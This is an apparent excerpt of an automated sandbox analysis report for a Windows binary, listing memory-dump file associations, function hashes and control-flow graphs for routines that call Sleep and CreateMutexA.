                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: ad8fc57c108231e2f710053dfda771ad93f40ea00ef2303e6b9d79c338df67b3
                                                                                                                                                                                                        • Instruction ID: 8d84745cbcff83f5ac15abffa97b3ae5568a41e010cca4d6d5d42cd5465d4998
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad8fc57c108231e2f710053dfda771ad93f40ea00ef2303e6b9d79c338df67b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE3128716141009BEB089BB8DD89BADF773DF82314F308719E418A73D5D73659808B56

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 275 66a1ae-66a1ce 279 66a1d0-66a1dc 275->279 280 66a1fc-66a218 275->280 283 66a1f2-66a1f9 call 67d663 279->283 284 66a1de-66a1ec 279->284 281 66a246-66a265 280->281 282 66a21a-66a226 280->282 287 66a267-66a273 281->287 288 66a293-66a916 call 6780c0 281->288 285 66a23c-66a243 call 67d663 282->285 286 66a228-66a236 282->286 283->280 284->283 289 66a935 284->289 285->281 286->285 286->289 294 66a275-66a283 287->294 295 66a289-66a290 call 67d663 287->295 291 66a953-66a994 Sleep CreateMutexA 289->291 292 66a935 call 696c6a 289->292 304 66a996-66a998 291->304 305 66a9a7-66a9a8 291->305 292->291 294->289 294->295 295->288 304->305 307 66a99a-66a9a5 304->307 307->305
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: 1e9358c5a728f0db5271d1b493364c9b23cdfeef2eba50dd2a7b5236f35b6a96
                                                                                                                                                                                                        • Instruction ID: 409799e289b41ec780f134710007cf8bd79d58c04411ab40147dea3a06fcb82a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e9358c5a728f0db5271d1b493364c9b23cdfeef2eba50dd2a7b5236f35b6a96
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3314831A04100DBEB089BA8DD88BACB777EFC6310F34865CE408A73D5D7365A808B12

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 309 66a418-66a438 313 66a466-66a482 309->313 314 66a43a-66a446 309->314 317 66a484-66a490 313->317 318 66a4b0-66a4cf 313->318 315 66a45c-66a463 call 67d663 314->315 316 66a448-66a456 314->316 315->313 316->315 319 66a93f-66a949 call 696c6a * 2 316->319 321 66a4a6-66a4ad call 67d663 317->321 322 66a492-66a4a0 317->322 323 66a4d1-66a4dd 318->323 324 66a4fd-66a916 call 6780c0 318->324 340 66a94e 319->340 341 66a949 call 696c6a 319->341 321->318 322->319 322->321 329 66a4f3-66a4fa call 67d663 323->329 330 66a4df-66a4ed 323->330 329->324 330->319 330->329 342 66a953-66a994 Sleep CreateMutexA 340->342 343 66a94e call 696c6a 340->343 341->340 345 66a996-66a998 342->345 346 66a9a7-66a9a8 342->346 343->342 345->346 347 66a99a-66a9a5 345->347 347->346
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: ee5bd0ba45e5fa98fcf8e61398b5cf0556e6a22e1e50d9e64c7cc1b173ab170c
                                                                                                                                                                                                        • Instruction ID: daac5d4b2664c3ab48f0fc77ea5299531b54e9ab29bb92714606c0e38f944797
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee5bd0ba45e5fa98fcf8e61398b5cf0556e6a22e1e50d9e64c7cc1b173ab170c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32314A31A04200DBEB089BB8DD89BADB7B3EFC1314F30861CE454AB3D9DB7559808B56

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 349 66a54d-66a56d 353 66a56f-66a57b 349->353 354 66a59b-66a5b7 349->354 355 66a591-66a598 call 67d663 353->355 356 66a57d-66a58b 353->356 357 66a5e5-66a604 354->357 358 66a5b9-66a5c5 354->358 355->354 356->355 361 66a944-66a949 call 696c6a 356->361 359 66a606-66a612 357->359 360 66a632-66a916 call 6780c0 357->360 363 66a5c7-66a5d5 358->363 364 66a5db-66a5e2 call 67d663 358->364 366 66a614-66a622 359->366 367 66a628-66a62f call 67d663 359->367 376 66a94e 361->376 377 66a949 call 696c6a 361->377 363->361 363->364 364->357 366->361 366->367 367->360 379 66a953-66a994 Sleep CreateMutexA 376->379 380 66a94e call 696c6a 376->380 377->376 383 66a996-66a998 379->383 384 66a9a7-66a9a8 379->384 380->379 383->384 385 66a99a-66a9a5 383->385 385->384
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
